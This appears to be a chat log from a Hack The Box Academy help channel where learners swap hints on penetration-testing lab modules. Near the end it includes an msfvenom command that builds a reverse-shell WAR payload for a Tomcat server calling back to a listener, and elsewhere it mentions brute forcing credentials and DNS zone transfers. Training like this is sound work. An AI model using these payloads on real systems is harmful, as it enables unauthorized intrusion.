I could never get anything higher than a med when I did it, and I waited for the scans to finish.

So i've managed to get ||Remote OS Command Injection|| from the results. That being said im not sure how to exploit it, it isnt clear from the result. Is this something I should jump into msfconsole or?

disregard, figured it out

Is shells and payloads skills assessment module laggy or is it my machine?

The whole platform is laggy today

I'm on that one. Having a hard time with the first host. Browser keeps timing out when I upload. Going to work on something else in the meantime. You using VM or pwn?

The user is good but this is the full name not username

what does that number mean

hi guys

Hi Guys i need help some help
im trying to solve this question from htba password attacks (Find the user for the SMB service and crack their password. Then, when you log in, you will find the flag in a file there. Submit the flag you found as the answer.) and i found the password and loged in to the smb and them cd to a share directory but i cant list its content i tried everythinggg !!

smb: > dir
NT_STATUS_ACCESS_DENIED listing *

i really need help

which tool you used to bruteforce password

i already found the creds i used hydra and carckmapexec but i cant list the connent of the shared folder

content *

use metasploit

as shown in module

and dont stop even after getting correct creds

sure i will try it right now

i solve it Thank You soo muchh dude <3333

i am also doing password attack module.

Great i wish you all the luck !

can anyone give me hint on this one

I suggest skimming over this section again, the answer is there

done, I made it complicated for myself

It's alright, that section is a long one

took me some brain power aswell

attacking common applications. skill assessmet 2. any hints for enumerating nagios xi for password?

why i keep getting this errors ? "Connection reset by peer"

is this a connection error ?

go back and "check in the fox", I think me and you can get away with this without spoiling to much

skills assessment?

#modules message

You using pwnbox and connecting with a vm? The connections will conflict then.

Yeaaahh

Introduction To Splunk & SPL --> open the "Search & Reporting" application, and find through an SPL search against all 4624 events the account name that made the most login attempts within a span of 10 minutes. Enter it as your answer.

The query i've used:
||index=* sourcetype=WinEventLog:Security EventCode=4624
| bucket span=10m _time
| stats count by _time, Account_Name
| sort - count
| head 10||

But all accounts found this way dont seem to be the right answer. I've tried some scrolling and sorting but didnt get any other accountnames. Any hints?

Introduction To Malware Analysis: Skills Assessment. I can't figure out the answer to the last question. Tried following the hint and just not getting it. If anyone can help I'd be grateful. 🙂

Hello world

Try to answer instead “which accounts only logged in in a 10m window and never before or after again and of those which has the highest successful logins”

kind a stuck here...WINDOWS PRIVILEGE ESCALATION / Other Files
i want to analyze the plum.sqlite file of the notes app. but i can't change the execution policy and therefore can't analyze the file directly on the windows host. but i also can't get it to the linux host....

Pwn

I'm working through the Footprinting module and am trying to get through the DNS exercises. I am down to the last one looking for the FQDN for the host with IP ending in 203 and can't find this host. I checked the hint and have tried almost all of the wordlists from SecLists with dnsenum. Anyone have any ideas on what I'm missing?

You have to find all the zones.
Take the smallest list. If you can't find anything, take the next largest list. Lists with 5000 entries are too big

Is it even right to concentrate on this file?

Okay, thank you! I'll give that a try

When you say find all the zones, you're talking about through zone transfers, right? Like executing dig axfr <dnsZone> @<dnsIP>

Remember that you can configure zones so that they do not allow a zone transfer from everyone

anybody?

I was able to decode the cookie using the tool on CyberChef, but I am not sure why I am not getting the same value when I use the Burp Suite tool to try to decode the cookie.

https://academy.hackthebox.com/module/110/section/1055

" The /admin.php page uses a cookie that has been encoded multiple times. Try to decode the cookie until you get a value with 31-characters. Submit the value as the answer. "

didn’t do this module but do u have to select Hex option in burp decode

WTF

3h lost with that shit

was a bug

thanks....

repair that module...

or that section: WINDOWS PRIVILEGE ESCALATION / Other Files

Since this is also the answer to the question I would have remove the message

I recall reading that, but I'm not sure how I can know which hosts can do that without access to the DNS server and the config files stored there

Just try transferring to all of them.

Was that a reply to me?

Yes

If you don't know. Just try all

If that doesn't work use tools

Gotcha. I did try that and that didn't yield any success, but I can try again tonight

Well tools can be used against subdomains

So, much like trying to axfr to subdomains, you can iterate through a list of subdomains for the tool

Are you thinking of dnsenum with a list of subdomains?

Perhaps

Always build your thinking from the ground up

Okay . . .

Ok let's walk through this
First step; you zone transfer to base domain, and don't find the answer
Second step; you try transferring to subdomains you find
Third; tools to bruteforce

Thank you for clarifying. I've done those steps, which led me to solutions to the other questions, just struggling with the last one.

Well, who says you're limited to using just the domain for the bruteforce tool, maybe subdomains can work too

Good point, I don't think I've tried that, I will give that a go tonight. Thank you for your help!

hello i am doing Linux Local Privilege Escalation - Skills Assessment and i need help with the 5th flag, i got a web shell from the tomcat but i cannot make a reverse shell

metasploit has a module for tomcat. use that

it has move than 30 modules and i tried like 10 of them allready, can you hint me so i can be on my way

it should be the authenticated code execution

if they don't work, you can always use msfvenom

create a war file payload

i did msfvenom but when i try to trigger runme war it just does nothing and the listener is running on metasploit

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.16.52 LPORT=4444 -f war > runme.war

Started reverse TCP handler on 10.10.16.52:4444

try setting your LHOST to 0.0.0.0 in msfconsole

i did, no reverse shell

oh i see the issue

for your msfvenom command, set the payload to a linux reverse tcp, like linux/x64/meterpreter/reverse_tcp

then try again with this payload in msfconsole

exploit/multi/handler

HTTP Status 404 – Not Found when i click on the payload

and no shell

you set the payload in the msfconsole?

oh i'm dumb i forgor

it should work t hen

You should check out the shells & payloads module
This is explained quite well there along with a cheatsheet

does it say "the requested resource is not available"

I have a question regarding the XSS module - Session hijacking section.
I found the cookie, where do I input it on the login.php?

i click on my shell but it just loads to infinity and no reverse shell

i'm not sure what you mean by that